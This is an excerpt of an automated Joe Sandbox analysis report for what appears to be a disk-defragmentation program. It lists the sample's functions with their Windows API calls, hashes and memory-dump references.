                                                                                                                                                                                                                                                                                    • Instruction ID: 5dffe6ef64173943b566a41739161ce8ce63ae2a9ff69b85a90aeb8992a9e3ab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24A17A71A043099FC324EF68C98096AB7F5FF89305F14892EE89687312D774F949CB5A
                                                                                                                                                                                                                                                                                    Function 0045D020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                    Function 0042B060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                    • String ID: C:\$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                    • Opcode ID: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                    Function 00456250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                    • Opcode ID: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 225ffd7624e7e299ef96e9004fd2a35e3cd367921e50112ae392b81e183853ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                    Function 00427220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                    Function 0042F110 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D750: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D750: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b7d0dfdc37c6029d1809ee2af6bf9b154064672585324479e47d4ede9078e07
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541A672B04310DBD310EF54E981B6BB7F4EB88714F91097EF945A7240D735AC488BAA
                                                                                                                                                                                                                                                                                    Function 0042D230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D31C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                    • Instruction ID: 93b085b09f2c4ac2bdbc263637bfa3f203d19d869e2dbc8046dfdb1fcf76ffa8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44311F35A00615CFC320DBB4E9C5A6BB7E0EB45311F5489AAE86ED2351DA34E8848B69
                                                                                                                                                                                                                                                                                    Function 00422C50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422CFC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-2981518532
                                                                                                                                                                                                                                                                                    • Opcode ID: 0e7f0c6ffb299524d5b60ab7c9997cd566ac00e0446ecfe3a210d46a3707fafd
                                                                                                                                                                                                                                                                                    • Instruction ID: c399ede082bf33e8358967d7bf4ff09710be0966645c3ad0fdc692b3c116348a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e7f0c6ffb299524d5b60ab7c9997cd566ac00e0446ecfe3a210d46a3707fafd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE21B1726003189BC728EE1DDD85BDAB7A0AF84700F90452DFE158F282DBB4AA04C798
                                                                                                                                                                                                                                                                                    Function 0041DDE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DE53
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                    • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                    • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                    • Opcode ID: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                    • Instruction ID: c621563c8422bd9a998db8b3ae63383a0df01fc5d31629062189869ad5b1e679
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16316AB1908701AFC314DF64DD85B5ABBE4FB88710F00492EF94A97290E735E948CB9A
                                                                                                                                                                                                                                                                                    Function 00463940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090068,?,00000008,?,?,00000000,00000000), ref: 004639CC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDevice
                                                                                                                                                                                                                                                                                    • String ID: JD$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2352790924-2424167441
                                                                                                                                                                                                                                                                                    • Opcode ID: 2908f10500851773ea917a472ec38425fc1f7a75da2bf9b2388671952093b7fd
                                                                                                                                                                                                                                                                                    • Instruction ID: eb6a3a0589f86c3bb2eb7d026cc259395d877a06b4f1ad3459572aa0b973dd10
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2908f10500851773ea917a472ec38425fc1f7a75da2bf9b2388671952093b7fd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C32128B56047018FC324DF69C880A2BB7E5FBC8314F008A2EE59587751D774EA4ACF92
                                                                                                                                                                                                                                                                                    Function 004329E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00432A59
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$tFH
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1887266447
                                                                                                                                                                                                                                                                                    • Opcode ID: 2b7ecd92578468ef1ac141b899e89e6d30bd51511ca2d11e6c2f0b9fe07e79fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 61f4021c422f63e7875300546f5658b29b21fa4e8b650a7ac1d2bdd352889d76
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b7ecd92578468ef1ac141b899e89e6d30bd51511ca2d11e6c2f0b9fe07e79fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21A1312447419FD631EF20CE86F9EB7A4EB84714F104A1EF259972D1CBF828458B5A
                                                                                                                                                                                                                                                                                    Function 00415E60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415EBC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
